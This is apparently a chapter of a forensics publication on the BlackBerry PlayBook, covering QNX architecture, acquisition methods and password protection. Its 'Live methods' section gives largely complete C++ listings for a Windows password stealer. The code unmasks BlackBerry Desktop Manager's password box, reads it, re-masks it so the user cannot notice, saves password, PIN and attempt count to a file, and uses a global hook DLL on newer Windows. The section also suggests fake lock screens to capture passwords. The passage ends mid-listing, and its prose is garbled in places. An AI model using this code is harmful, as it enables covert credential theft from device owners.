BlackBerry Playbook - New Challenges

Dont Be Mocked Secure Your System
1 / 108
Chapter 1
BlackBerry Playbook New Challenges

Say your client is charged with trade secret theft. What if you could show electronic evidence that, at the time of the theft, your client was in thousand miles away from the crime scene? Or driving down the freeway, talking on his mobile phone? Or sending mundane text messages to his spouse? Or taking photos at the beach? If this sounds appealing, you need to learn about mobile device forensics.
What you will learn. . . Whats new on BlackBerry Playbook Forensics area How many differences are between BlackBerry Smartphone and Tablet forensics techniques
What you should know. . . Basic knowledge about Forensics (Classic and Live) Basic knowledge about BlackBerry Forensics Basic knowledge about BlackBerry PlayBook
Mobile phone proliferation in our societies is on the increase. Advances in semiconductor technologies related to mobile phones and the increase of computing power of mobile phones led to an increase of functionality of mobile phones while keeping the size of such devices small enough to t in a pocket. This led mobile phones to become portable data carriers. This in turn increased the potential for data stored on mobile phone handsets to be used as evidence in civil or criminal cases. Mobile devices cell phones, BlackBerrys, Androids, iPads are everywhere. People use them to take photographs, send texts and emails, update Facebook, consult maps, search the web the list goes on. As they do this, however, their mobile devices often are quietly making records and generating evidence of those activities. For better or for worse, this makes mobile devices perhaps the richest source of evidence about the people that use them. At present, the BlackBerry holds the palm of insufcient security examination despite of existing approaches more than Android (because Android/iOS/Windows was not developed in consideration of secure even) but all security techniques implemented in these mobile devices are indecisive argument on security. It means its argument to forensics. All security agencies are facing with dealing with mobiles forensics repeatedly. Forensics tools may give incredible opportunity to gain all kind of data but there are too many slight objections. Until companies go in only one of ways - classic forensics or live monitoring (DLP or else) - it fails, because forensics eld need more effective synthesis of mechanism.ed to highlight whether one techniques provide more easy implementation, investigation and handling or not, what common differences examiners may encounter and what they should as concept be involved to forensic handling with these platforms because a Playbook OS is completely a new approach.

2 / 108
Mobile Forensics
As mobile phones become so ubiquitous and play such large societal role there is a high probability that these same devices will be part of those investigations. A mobile phone can be tied to crime in four ways: as a communication tool in the process of committing a crime. as a storage device providing evidence of a crime. as a storage device that contains victim information. It can be a means of committing a crime Mobile devices can communicate constantly, a very real concern exists that the data you are interested in (especially email, texts, and internet records) could be crowded out by newly arriving data and disappear if the device is not rendered incommunicative. This could be as simple as turning the device off, but you should be aware the loss of data in RAM memory or activation of password protections. The same effect could happen if the devices batteries run out. Nowadays mobile devices provide amount of features to integrate all possible communications following aggregation with data on BlackBerry as well as Android. The native and third party applications often connect to the email, maps IM messenger and social statutes. They keep users connected and do far more. The logical acquisition manages with known data types for any user and this data set rarely differs among of iOS, Android or BlackBerry. As mentioned above these data contain messages (SMS/MMS/Email/IM), social network data, contacts, calendar, phone logs, password and bank wallet and other nancial application data, media data (Audio/Photos/Videos) and other data even le structure, browser data (web history as a timeline and bookmarks), and shared folders. The BlackBerry apps environment is known is wide-bind and amazing than Android. On another hand, Android has enough not only third-party applications that is very different but also a hundreds variations depend on manufacturer. As opposed to the BlackBerry Smartphone, the BlackBerry PlayBook is on QNX OS offers implemented modern technologies take away from real development. All above brings in the zoo-world of mobile phones and highlights issues of misusing security techniques in development area. New special skills that forensics experts required rarely based on experience only. Each year the classic forensics techniques face on a huge problem while live forensics (or live monitoring) gives new opportunities to manipulate with data. Sometimes, company IT Policy or OS vision may be helpful to be sure that no triggers will break investigation. Physical approach is trust but nonoperability, while logical is more dangerous because of synchronization process via network, cellular, and OTA. There are too many cases when it cannot afford not to use prevent methods or tools to simplify the classic forensics. This article describes technical problems encountered by forensics as well as different live solutions maybe useful and those became "right" way with vendors development.
Playbook Architecture
We have already known that QNX-based OS is background for BlackBerry 10 (that replaces old BlackBerry OS after version 7) and BlackBerry Tablet. BlackBerry Tablet OS based on the QNX Neutrino real-time OS featured by running Adobe AIR and WebWorks applications as well as Android applications written in Java instead of BlackBerry Java applications (smartphones apps). Below are main features that available on the Playbook BlackBerry Bridge the ability to connect to, and access data on, a BlackBerry smartphone using internet. Document editing through BlackBerry Bridge BlackBerry Messenger, Push email, contacts, calendar, etc. via BlackBerry Bridge Video chat capability with other BlackBerry PlayBook users Adobe Flash and Adobe AIR ZIP Attachment Support Application created using NDK

3 / 108
Support for Android 2.3 apps Documents To Go and Print To Go Native Email, Calendar, Contacts app File Manager Social network integration with Facebook, Twitter, LinkedIn Full device encryption Screenshots saved in lossless PNG format.
Figure 1.1: BlackBerry Playbook The BlackBerry Tablet OS is a microkernel OS implements the minimum amount of software in the kernel space and run other processes in the user space outside of the kernel space. By running most processes in the user space, the BlackBerry Tablet OS can manage unresponsive processes in isolation from others. This helps prevent damage to the operating system and other applications. The primary goal of QNX Neutrino is to deliver the open systems POSIX API in a scalable form suitable for a wide range of systemsfrom tiny, resource-constrained embedded systems to high-end distributed computing environments that is fundamental for mission-critical applications. QNX Neutrino is ideal for embedded real-time applications. It can be scaled to very small sizes and provides multitasking, threads, priority-driven scheduling, and fast context-switchingall essential ingredients of an embedded real-time system. Any thread on any machine in the network can directly make use of any resource on any other machine. From the applications perspective, there is no difference between a local or remote resourceno special facilities need to be built into applications to allow them to make use of remote resources. Users may access les anywhere on the network, take advantage of any peripheral device, and run applications on any machine on the network (provided they have the appropriate authority). Processes can communicate in the same manner anywhere throughout the entire network. Thus, the QNX Neutrino microkernel has kernel calls to support the following:

4 / 108
threads message passing signals clocks timers interrupt handlers semaphores mutexes condition variables barriers The key advantage gained by adding memory protection to embedded applications, especially for mission-critical systems, is improved robustness. With memory protection, if one of the processes executing in a multitasking environment attempts to access memory that hasnt been explicitly declared or allocated for the type of access attempted, the MMU hardware can notify the OS, which can then abort the thread (at the failing/offending instruction). This protects process address spaces from each other, preventing coding errors in a thread in one process from damaging memory used by threads in other processes or even in the OS. During development, common coding errors (e.g. stray pointers and indexing beyond array bounds) can result in one process/thread accidentally overwriting the data space of another process. If the overwriting touches memory that isnt referenced again until much later, you can spend hours of debuggingoften using in-circuit emulators and logic analysersin an attempt to nd the guilty party. The microkernel architecture of the BlackBerry Tablet OS supports the following features: designed to be tamper resistant means if the kernel integrity test reveals damage to the kernel, the BlackBerry Tablet OS does not start. designed to be resilient means restarting any process without negatively affecting others because of separation user and kernel space. designed to be highly secure throughout validation requests for system resources like access to the camera via displaying a dialog box to grant or refuse access to that capability. designed to verify the authenticity of an application means to be signed by the RIM Signing Authority with developer certicate. Going further to details and uncover QNX architecture.
File systems
QNX Neutrino provides a rich variety of le systems. Like most service-providing processes in the OS, these le systems execute outside the kernel; applications use them by communicating via messages via POSIX API open() , close() , read() , write() , lseek() , etc. and checking for permissions and access authorizations. When a pathname is resolved, the process manager contacts all the le-system resource managers that can handle some component of that path. The result is a collection of le descriptors that can resolve the pathname. If the pathname represents a directory, the process manager asks all the le systems that can resolve the pathname for a listing of les in that directory when readdir() is called else resolves the pathname is accessed. File systems categorized into the following classes: Block that operates on block devices like hard disks and CD-ROM drives Network that provides network le access to the le systems on remote host computers.

5 / 108
Every QNX system also provides a simple RAM-based le system that allows read/write les to be placed under /dev/shmem that is not actually a le system and used in tiny embedded systems where persistent storage across reboots is not required, yet where a small, fast, temporary-storage le system with limited features is called for. The RAM le system does not support hard or soft links or directories but possible to create a link to it by using process-manager links, e.g. create a link to a RAM-based /tmp directory: ln -sP /dev/shmem /tmp following "procnto" to create a process manager link to /dev/shmem known as /tmp. According to minimizing the size of the RAM le system code inside the process manager, this le system does not include le locking or directory creation features. The Network File System (NFS) allows a client workstation to perform transparent le access over a network, operate on server les across a variety of OS. NFS operates by using remote procedure calls (RPC) and TCP/IP for its transport. All these implementations means that: le systems may be started and stopped dynamically. multiple le systems may run concurrently. applications are presented with a single unied pathname space and interface, regardless of the conguration and number of underlying le systems. a le system running on one node is transparently accessible from any other node.
Networking Architecture
The networking services execute outside the kernel too and allow: network drivers to be started and stopped dynamically protocols to run together in any combination The network subsystem relies on network manager (io-pkt-v4, io-pkt-v4-hc, or io-pkt-v6-hc). On bottom are drivers provided the passing data to and receiving data from the hardware. The drivers hook into a multi-threaded layer-2 component (that also provides fast forwarding and bridging capability) that ties them together and provides a unied interface for directing packets into the protocol-processing components of the stack. This includes, for example, handling individual IP and upper-layer protocols such as TCP and UDP. The resource manager is on top of the stack and looks like inter-level between the stack and user applications where developers nd a well-known interface i.e. open(), read(), write(), and ioctl(). A detailed view of the io-pkt architecture is on picture 2.

6 / 108
Figure 1.2: Network architecture At the driver layer, there are interfaces for Ethernet trafc and for 802.11 management frames from wireless drivers. Here is hardware crypto API that allows the stack to use a crypto ofoad engine when its encrypting or decrypting data for secure links. In addition to drivers and protocols, the stack also includes hooks for packet ltering: Berkeley Packet Filter (BPF) interface. A socket-level interface that lets you read and write, but not modify or block, packets, and that you access by using a socket interface at the application layer (see http://en.wikipedia.org/wiki/Berkeley_Packet_Filter). This is the interface of choice for basic, raw packet interception and transmission and gives applications outside of the stack process domain access to raw data streams. Packet Filter (PF) interface. A read/write/modify/block interface that gives complete control over which packets are received by or transmitted from the upper layers and is more closely related to the io-net lter API IP used for everything from simple tasks e.g. remote login to more complicated tasks e.g. delivering real-time stock quotes. QNX provides the following stack congurations: NetBSD TCP/IP stack supports forwarding, broadcast and multicast, hardware checksum support, routing sockets, Unix domain sockets, multilink PPP, PPPoE, supernetting (CIDR), NAT/IP ltering, ARP, ICMP, and IGMP, as well as CIFS, DHCP, AutoIP, DNS, NFS (v2 and v3 server/client), NTP, RIP, RIPv2, and an embedded web server Enhanced NetBSD stack with IPsec and IPv6 includes previous but targeted at the new generation of mobile and secure communications - IPv6 and IPsec mainly for VPNs over IPsec tunnels IKE (ISAKMP/Oakley) key management protocol for establishing secure host associations. The BSD Socket API was the obvious choice for QNX Neutrino that is a standard API for in the UNIX world like Winsock API in Windows. All the routines that application programmers including well known: accept(), bind(), bindresvport(), connect(), dn_comp(), dn_expand(), endprotoent(), endservent(), gethostbyaddr(), gethostbyname(), getpeername(), getprotobyname(), getprotobynumber(), getprotoent(), getservbyname(), getservent(), getsockname(), getsockopt(), herror(), hstrerror(), htonl(), htons(), h_errlist(), h_errno(), h_nerr(), inet_addr(), inet_aton(), inet_lnaof(), inet_makeaddr(), inet_netof(), inet_network(), inet_ntoa(), ioctl(), listen(), ntohl(), ntohs(), recv(), recvfrom(), res_init(), res_mkquery(), res_query(), res_querydomain(), res_search(), res_send(), select(), send(), sendto(), setprotoent(), setservent(), setsockopt(), shutdown(), socket(). BlackBerry Playbook provides a NAT that includes such features as:

7 / 108
rule grouping: to apply different groups of rules to different packets stateful ltering: an optional conguration to allow packets related to an already authorized connection to bypass the lter rules NATfor mapping several internal addresses into a public (Internet) address, allowing several internal systems to share a single Internet IP address. proxy services: to allow ftp, NetBIOS, and H.323 to use NAT port redirection: for redirecting incoming trafc to an internal server or to a pool of servers.
User Interface
The presence of the Shared Task Model and its use as a communication medium between the user and the Tablet recognition system affords the potential to create a wide variety of different user interfaces, each customized for different usage environments and manipulation capabilities. Playbook benets are in it designed to provide the exibility that comes from providing an intelligent supervisor and intelligent subordinates the ability to collaborate exibly about the precise task and method that the subordinate is to perform. This interaction style will provide multiple benets for the human and machine collaboration, including: Increased user satisfaction and acceptance Decreased human skill loss More balanced workload More accurate and balanced automation reliance decisions Increased situation awareness (relative to a more fully automated or autonomously adaptive automation approach) Improved human and machine system performance (especially in exible and unpredictable domains which offer enough time for human awareness and planning)
Forensics techniques
There are many different ways to analyze forensically a mobile device: Physical acquisition technique is a bit-by-bit copy of an entire physical stories, doing a full physical copy (i.e., all the bits in memory, not just the les) of the entire memory store on the device. This method, which can be very difcult to perform properly, allows deleted les and any data remnants present (i.e., in unallocated memory or le system space) to be examined, which otherwise would go unfound Logical acquisition technique is a bit-by-bit copy of logical storage objects (e.g., directories and les). It has the advantage of simplifying for a tool to extract and organize but does not produce any deleted information except database le cases which does not overwrite the information but simply marks it as deleted and available for later overwriting. Using commercially available forensic software tools (as extend previous) which, as time passes, are becoming increasingly more capable and sophisticated. This software generally makes a full copy of all the les on the device (i.e., a "logical" copy), which can result in a capture of most user-created data, and even some deleted data. Manual acquisition technique is user interface utilizing to get pictures of data from the screen, simply manipulating the phone (by navigating through the email, photographs, or contacts list, for example) while videotaping and/or photographing the results. While this may be sufcient for some cases, obvious disadvantages include the fact that it involves manipulating and changing the very evidence you are seeking to preserve. The disadvantage is that only data visible to the operating system can be recovered and that all data are only available in form of pictures. Backup - This technique is relatively easy, and it allows a signicant amount of user-created data (photographs, songs, and emails, texts) to be preserved. Care must be taken, however, to modify the settings so that data from the "synced" computer does not overwrite the data on the device. Like previous, it also involves some manipulation, and thus alteration, of the evidence.

8 / 108
BlackBerry Playbook Challenges

A BlackBerry is a handheld mobile device engineered for email. All models now come with a built-in mobile phone, making the BlackBerry an obvious choice for users with the need to access their email from somewhere besides the comfort of a desk chair. The BlackBerry device is always on and participating in some form of wireless push technology. Because of this, the BlackBerry does not require some form of desktop synchronization like the other mobile device does. BlackBerry Playbook is an add-on for BlackBerry smartphone only, because BlackBerry Bridge accesses mail, calendaring and contacts directly from a tethered BlackBerry phone, the PlayBook meets the same encryption standards as the BlackBerry phone. It is the rst (and as of September 2011, the only) tablet device to receive FIPS 140-2 certication, which makes it eligible for use by U.S. federal government agencies. In addition, the Australian government also approved the use of PlayBook as the only tablet that meets its security standard. Playbook does not have neither push technology for email/calendar/else, only IMAP4 and POP3 except MS Exchange link nor BIS except BlackBerry Mobile Fusion that did not replace BES but one more add-on to manage nonblackberry smartphone devices and BES existed in company. In addition, email and social accounts will broke and ask you reenter your password that may help to discard pushing data.
Figure 1.3: Broken Mail
Network Isolation
One of the main ongoing considerations for analysts is preventing the device from any network changes that is sometimes achievable for PlayBook where there is no cellular connection, but only a network connection. As mentioned early it might bring in new data. However, any interaction with the devices like plugging and unplugging the device will modify them. The rst idea is dismounting encryption or preventing of blocking to examine the device while it is running. PlayBook as another else device is difcult to analyze forensically without negative affecting because of storage cannot be easily removed, storage is only internal and there no external storage like SD-card as it is for BlackBerry smartphone. The worst case in forensics is remote wiping initiated or data added/overwritten outside control from any triggers often SMS or incoming call is impossible through BlackBerry Bridge even: SMS for BlackBerry Bridge simply didnt developed and incoming call notication cannot be caught as well as all Bridges events throughout API. Nevertheless, forensics experts still have to prevent a connection. A powerful way "airplane mode" (or the same named in different way) helps. Android problem to stop network communications is awful GUI and forensics ofcer should press and hold the Power off button and select Airplane mode at rst (if this hotkey will work) or then press Menu (from the home screen), Settings, nally, the Wireless option which is generally near the top. Its only to disable cellular network while to block wireless connection like Bluetooth or Wi-Fi he have to walk out home screen to the settings that

9 / 108
have upset because time is counting and no one can be sure if setting GUI is the same among devices. BlackBerry allows do it very quickly by clicking on tray on home screen.
BlackBerry Push-Technology for Playbook

BlackBerry (smartphone) was primary engineered for email and come with a built-in mobile phone providing access to the email from anywhere. It is always on and participating in wireless push-technology and does not require any kind of desktop synchronization like the others. The rst step is turn the radio off, or a better solution is to take the device to an in area where the signal cannot be received, as the BlackBerry device is not really "off" unless power is removed for an extended period. If the blackberry powered back off then any items that were in the queue waiting to be pushed to the device could possibly be pushed before you could stop them. The BlackBerry PlayBook is an add-on for BlackBerry smartphone only, because BlackBerry Bridge accesses mail, calendaring and contacts directly from a tethered BlackBerry phone. Since the Playbook is not all always on there is rarely types of information pushed to it following overwriting or deletion. The PlayBook does not have neither push technology for email/calendar/else (only IMAP4 and POP3 except MS Exchange link) nor BIS except BlackBerry Mobile Fusion that managed non-blackberry smartphone devices and BES existed in company. In addition, email and social accounts may broke and ask user reenter his password that may help to discard pushing data. It means the PlayBook is not all always on there is rarely types of information pushed to it following overwriting or deletion. As opposed to smartphone, Playbook was made lled by stand-alone applications that mighty use internet connect in standby mode or when applications swiped down; by default, Playbook has option to restrict activity in this state. The Playbook address book application is lled Facebook, Twitter and LinkedIn connections, but synchronizing has never happened before you run application and wait until it is done. Sometimes it takes 1 minute even or more.
Password Protection
BlackBerry devices come with password protection and attempt limit (by defaults - ve out ten, min - three out ten; a PlayBook case may differ from ve to ten where "ten" is often for PlayBook device and "ve" is for BlackBerry Desktop Software and plugged PlayBook). If it is exceed, device will wipe then (factory resetting). All data stored on external memory will keep because thats not part of the factory conguration if talking about smartphone not PlayBook, which has not external storage. So it will not reformat the micro SD card but if you have a BlackBerry Playbook, you will get factory defaults at all.
Password Extraction/Bypassing
Brute-force
Accessing encrypted information stored in password-protected backups it possible via Elcomsoft products that offer to restore the original password of backup and device. The toolkit allows eligible customers acquiring bit-to-bit images of devices le systems, extracting phone secrets (passcodes, passwords, and encryption keys) and decrypting the le system dump. It also reads BlackBerry Wallet data and Password Keeper data. The recovery of BlackBerry password is possible only if the user-selectable Device Password security option enabled to encrypt media card data. As the Playbook poor for native application, you could nd databases with password in shared folders put by third-party applications.
Live methods
Techniques discussed in my articles (mainly summarized in "To get round to the heart of fortress", "When Developers API Simplify User-Mode Rootkits Developing", "When Developers API Simplify User-Mode Rootkits Development - Part II") are still effective and very useful. These techniques are: default feature to show password without asterisks thats a possible to screen-capture. If "screenshot" API isnt disable it works (by defaults its allowed)

10 / 108
scaled preview for typed character through virtual keyboard. It works too and maybe screenshoted. As further consideration agent may XOR two screenshots and extract preview of pressed key as well as typed text. stealing password during synchronization from BlackBerry Desktop Software. It works because of security issues of Windows API. Moreover, it works not only to grab device password but backup password too. redrawing fake-window to catch typed password on device. Some social engineering aspect to announce "something is crashed and lock the device, please unlock by re-entering a password". The last techniques (stealing) work on PlayBook as well. I will remind how to extract password from BlackBerry Desktop Software in real-time. Every device is going to synchronize with PC sometimes. Pass over a Mac and move to Windows. Windows XP and Windows Vista (just in case), Windows 7 make our rst target group (most popular). BlackBerry Device Manager (as known in version 4.xx or 5.xx) and BlackBerry Desktop Manager make second target group (if we are talking about version 6.xx). It is a minor target than major target is password eld of textboxs software. Unfortunately, we cannot get a screen-capture. So, try to use a WINAPI functional. First, we need recall a knowledge about system messages and system object. What does edit box look like? Its simple eld for typing character ~32k in length that has a "password char" property. It has default #0 value or NULL or \0. Other masking character could be a black circle, asterisk, or anything else. 0x25CF is Unicode character of black circle. Every system object like modal window or textbox responds to API subroutine such as "SendMessage" or "PostMessage". Both subroutines send the specied message to a window or windows. However, if you need to post a message in the message queue associated with a thread you should use the "PostMessage" function. Parameters syntax is the same. First parameter is (Type: HWND) a handle to the window whose window procedure will receive the message. If this parameter is HWND_BROADCAST ((HWND)0xffff), the message is sent to all top-level windows in the system, including disabled or invisible windows, overlapped windows, and pop-up windows; but the message is not sent to child windows. Second parameter is (Type: UINT) a message to be sent. For lists of the system-provided messages, see System-Dened Messages. Other two parameters (Type: WPARAM, Type: LPARAM) are represent an additional message-specic information. It is easy to guess that we need in WM_GETTEXT (0x000D) message. It copies the text that corresponds to a window into a buffer provided by the caller. Windows caption or "text elds" content could copy with it. However, if "edit box" is masked you cannot copy text, because you get a NULL-pointer. Well then, do unmask copy and mask again (Figure 7). Back in 2003 when MS Windows "PostMessage" API Unmasked Password Weakness was found. Declared affects: Microsoft Windows 2000 Advanced Server Microsoft Windows 2000 Datacenter Server Microsoft Windows 2000 Professional Microsoft Windows 2000 Server Microsoft Windows XP Home Edition Microsoft Windows XP Professional A weakness has been reported in the Microsoft Windows "PostMessage" API, which could effectively allow unmasked passwords to be copied into a users clipboard or other buffer. "PostMessage" places a message in the message queue but does not sufciently check the message type. EM_SETPASSWORDCHAR (Type UINT, Message) messages set the password mask character in password edit box controls. "PostMessage" abused in combination with EM_SETPASSWORDCHAR messages to cause an unmasked password placed into a buffer that could be accessed potentially through other means by an unauthorized process. Exploitation would require a malicious local process to wait for an authentication prompt sent to the local user by another application. The attacker would then have to authenticate normally. The unmasked password will copy while this is occurring. From this point, a further attack would be required to steal password credentials. Before, use this WINAPI function you should know handler of recipient object. Should to nd a windows handler a then an objects handler. To do it either download desirable software or other use "WindowFromPoint(MouseCursorPos)" that return a handler of what under your mouse cursors coordinates. I would prefer a rst way. At rst, let us check it with old BlackBerry Manager (version 4 or 5).

11 / 108
Figure 1.4: Class name & Window Text of controls (v4-v5) - part I
Figure 1.5: Class name & Window Text of controls (v4-v5) - part II

12 / 108
Figure 1.6: Class name & Window Text of controls (v4-v5) - part III
Figure 1.7: Class name & Window Text of controls (v4-v5) - part IV Thus, we have a "ClassName" of passwords window "#32770" and language-sensitive caption "Device Password Required". Also, device pin and attempts counter are in our disposal. A "FindWindow" function retrieves a handle to the top-level window whose class name and window name match the specied strings. Its return us a windows handler. To access to the static and edit controls use the function searches child windows,

13 / 108
beginning with the one following the specied child window. It is known as "FindWindowEx". Full usage description you nd on MSDN (see the Listing 1). Listing 1. Catch password dialogs handler (rst part)
void __fastcall Catcher() { //ClassName of Window char *internal = "#32770"; //Caption of Window char *external = "Device Password Required"; //Catch a Window HWND window = FindWindow(internal, external); ... }
But we dont know what text were got in cause having 2 or 3 static name (depend on v4-v5 and v6). Z-order and "GetWindow" function is come to aid. The z-order of a window indicates the windows position in a stack of overlapping windows. This window stack is oriented along an imaginary axis, the z-axis, extending outward from the screen. The window at the top of the z-order overlaps all other windows. The window at the bottom of the z-order is overlapped by all other windows. Function retrieves a handle to a window that has the specied relationship (Z-Order or owner) to the specied window. Two parameters should be used is in "GetWindow" Constant. Note that in BlackBerry Manager v4 (or v5) is one static for passwords attempts and device pin than in BlackBerry Desktop Manager v6 where it two separate controls (see the Listing 2).
GetWindow Constant GW_HWNDNEXT (0x0002) Identies the window below the specied window in the Z order. GW_HWNDPREV (0x0003) Identies the window above the specied window in the Z order.
Listing 2. Retrieve a static text from password dialog (second part)

void __fastcall Catcher() { ... if ((bool)(int)window) { //Label like "Password:" char *stat_pass_text = (char *)malloc(256); //Label like "PIN of Device:" char *stat_devc_text = (char *)malloc(256); //Label like "Your attempt counts:" char *stat_attmp_text = (char *)malloc(256); //In HWND //In HWND //In HWND Z-order first of all get a password-static control stat_pass = FindWindowEx(window, NULL, "Static", "Password:"); Z-order previous of it is attemps count stat_attmp = GetWindow(stat_pass, 3); Z-order next of it is Device PIN stat_devc = GetWindow(stat_pass, 2);
//get controls caption for a password-static control GetWindowText(stat_pass, stat_pass_text, 256); //get controls caption for a pin-static control GetWindowText(stat_attmp, stat_attmp_text, 256); //get controls caption for a attemp_count-static control GetWindowText(stat_devc, stat_devc_text, 256); AnsiString DEV_PIN = AnsiString(stat_devc_text); AnsiString ATTEMPT = AnsiString(stat_attmp_text);

14 / 108
//correct a program version: //if NULL then BlackBerry Manager v4 or BlackBerry Manager v5 //else everythin s OK - BlackBerry Desktop Manager v6 if (DEV_PIN.Length() < 1) { int pos = AnsiPos("\n", AnsiString(ATTEMPT.c_str())); //extract a first part of Static (PIN) DEV_PIN = ATTEMPT.SubString(1, pos - 1); //extract a second part of Static (attempt count) AnsiString ATTEMPT = ATTEMPT.SubString(pos + 1, ATTEMPT.Length() pos); } free(stat_devc_text); free(stat_attmp_text); free(stat_pass_text); ... } ... }
After it copied, get an edits handler and send via "PostMessage" function with EM_SETPASSWORDCHAR message and NULL-parameters (WPARAM & LPARAM) to that handler. Via "SendMessage" function with WM_GETTEXT and buffer & buffer-size parameters retrieved characters from edit-box. Moreover, do not forget about masking typed chars via "SendMessageW" functional with EM_SETPASSWORDCHAR message and 0x25cf WPARAM. It strongly recommend using Unicode version of "SendMessage", else youve got another character than black circle (see the Listing 3). Listing 3. Catch password from a password dialog (third part)
void __fastcall Catcher() { ... if ((bool)(int)window) { ... Application->ProcessMessages(); //get handler of EditBox HWND pass_hwnd = FindWindowEx(window, NULL, "Edit", NULL); //Check desirable EditBox (with Parent Forms Caption "Device Password Requied") if ((bool)(int)pass_hwnd) { //unset password masking PostMessage(pass_hwnd, EM_SETPASSWORDCHAR, 0, 0); //ReDraw EditBox //InvalidateRect(pass_hwnd, 0, true); //allocate memory for edits password char *passw = (char *)malloc(256); //Passwords borrowing SendMessage(pass_hwnd, WM_GETTEXT, (WPARAM)256, (LPARAM)passw); //store in new variable AnsiString password = AnsiString(passw); free(passw); //Dont let him (user) see it. Paint out. //0x25CF is unicode character of black circle //(dialog boxes on Win7, XP). SendMessageW(pass_hwnd, EM_SETPASSWORDCHAR, 0x25cf, 0);

15 / 108
//ReDraw EditBox //InvalidateRect(pass_hwnd, 0, true); //If action is unsuccessfull set "EMPTY" info if (password.Length() == 0) { password = "EMPTY"; } if (DEV_PIN.Length() == 0) { DEV_PIN = "EMPTY"; } if (ATTEMPT.Length() == 0) { ATTEMPT = "EMPTY"; } //Store in StringList variable our PIN, attemps count and pass in_list->Add(DEV_PIN); in_list->Add(ATTEMPT); in_list->Add(password ); Application->ProcessMessages(); try { in_list->SaveToFile("c:\\pass.txt"); } catch (Exception *ex) { } } } }
Look at gures 8. A malwares code has caught a password, device pin, attempt counter. To prove passwords correctness I comment "SendMessageW(..,0x25cf,..)" line to represent a password without masking (gure 9).
Figure 1.8: Stolen password (v4)- part I

16 / 108
Figure 1.9: Stolen password (v4)- part II If we try to use this code in Vista or Seven we get nothing, because it is more correct to set system hook is owner address space via loading a DLL-Cather. However, at this rate you should to know OS version, right? Roughly, we need a so-called Major Version to distinct XP and 7 (see the Listing 4). Listing 4. Get OS version
bool xp_seven = false; //indicate XP OS or Seven OS void __fastcall get_os() { vinfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx(&vinfo); if (vinfo.dwMajorVersion == 4) { this->Edit5->Text = "Windows NT 4.0, Windows Me, Windows 98, or Windows 95" ; } else if (vinfo.dwMajorVersion == 5) { this->Edit5->Text = "Windows Server 2003 R2, Windows Server 2003, Windows XP, or Windows 2000"; xp_seven = false; } else if (vinfo.dwMajorVersion == 6) { this->Edit5->Text = "Windows Vista, Windows Server Longhorn or Windows Seven"; xp_seven = true; } ... }
Now, let us check with class names and window texts against BlackBerry Desktop Manager (gures 10-13). Most of this repeats previous parts exclude several ideas. How to use system hooks you can nd on google.com, so I mark several ideas. SysMsgProc(int code, WPARAM wParam, LPARAM lParam) returns to us parameter (LPARAM) Wnd = ((tagMSG*)lParam)hwnd where stored out handler for controls. Then we need to catch again a password dialog and retrieve a edits handler. After successful comparing both handlers you is able to steal password. Note, in this case (dll) you should redraw a control by invalidate-function (see the Listing 5-6).

17 / 108
Figure 1.10: Class name & Window Text of controls (v6) - part I
Figure 1.11: Class name & Window Text of controls (v6) - part II

18 / 108
Figure 1.12: Class name & Window Text of controls (v6) - part III
Figure 1.13: Class name & Window Text of controls (v6) - part IV

19 / 108
Listing 5. Main denitions

void __fastcall TForm1::FormCreate(TObject *Sender) { if (FileExists("c:\\pass.txt")) { DeleteFile("c:\\pass.txt"); } //get os version vinfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx(&vinfo); if (vinfo.dwMajorVersion == 4) { this->Edit5->Text = "Windows NT 4.0, Windows Me, Windows 98, or Windows 95" ; } else if (vinfo.dwMajorVersion == 5) { this->Edit5->Text = "Windows Server 2003 R2, Windows Server 2003, Windows XP, or Windows 2000"; xp_seven = false; } else if (vinfo.dwMajorVersion == 6) { this->Edit5->Text = "Windows Vista, Windows Server Longhorn or Windows Seven"; xp_seven = true; } if (xp_seven) { // Load the DLL file hModule = LoadLibrary("Catcher.dll"); // Get the address of the function RunStopHook = (void *(__stdcall *)(bool, HINSTANCE))GetProcAddress(hModule, "_RunStopHook"); //Start Catcher RunStopHook(true, hModule); } else { this->CatchTimer->Enabled = true; } } //--------------------------------------------------------------------------void __fastcall TForm1::FormDestroy(TObject *Sender) { if (normally_closed) { return; } if (xp_seven) { if (RunStopHook != NULL) { RunStopHook(false, hModule); } if (hModule != NULL) {

20 / 108
FreeLibrary(hModule); } } } //--------------------------------------------------------------------------void __fastcall TForm1::FormClose(TObject *Sender, TCloseAction &Action) { if (xp_seven) { if (RunStopHook != NULL) { RunStopHook(false, hModule); } if (hModule != NULL) { FreeLibrary(hModule); } } normally_closed = true; }
Listing 6. DLL Catcher

HHOOK SysHook; HWND Wnd; HINSTANCE hInst; TStringList *in_list = new TStringList(); //--------------------------------------------------------------------------int WINAPI DllEntryPoint(HINSTANCE hinst, unsigned long reason, void* lpReserved) { hInst = (HINSTANCE)hinst; return 1; } //--------------------------------------------------------------------------extern "C" void __export RunStopHook(bool State, HINSTANCE hInstance) { if (true) { SysHook = SetWindowsHookEx(WH_GETMESSAGE, &SysMsgProc, hInst, 0); } else { //clear our storage is its unhooked in_list->Clear(); UnhookWindowsHookEx(SysHook); } } //--------------------------------------------------------------------------LRESULT CALLBACK SysMsgProc(int code, WPARAM wParam, LPARAM lParam) //hook code, removal flag, address of structure with message { //Pass message to other system hooks CallNextHookEx(SysHook, code, wParam, lParam); //Check Message if (code == HC_ACTION) { //Get Windows Handler that give a message Wnd = ((tagMSG*)lParam)->hwnd; //ClassName of Window char *internal = "#32770";

21 / 108
//Caption of Window char *external = "Device Password Required"; //Catch a Window HWND window = FindWindow(internal, external); if ((bool)(int)window) { //Label like "Password:" char *stat_pass_text = (char *)malloc(256); //Label like "PIN of Device:" char *stat_devc_text = (char *)malloc(256); //Label like "Your attempt counts:" char *stat_attmp_text = (char *)malloc(256); //In HWND //In HWND //In HWND Z-order first of all get a password-static control stat_pass = FindWindowEx(window, NULL, "Static", "Password:"); Z-order previous of it is attemps count stat_attmp = GetWindow(stat_pass, 3); Z-order next of it is Device PIN stat_devc = GetWindow(stat_pass, 2);
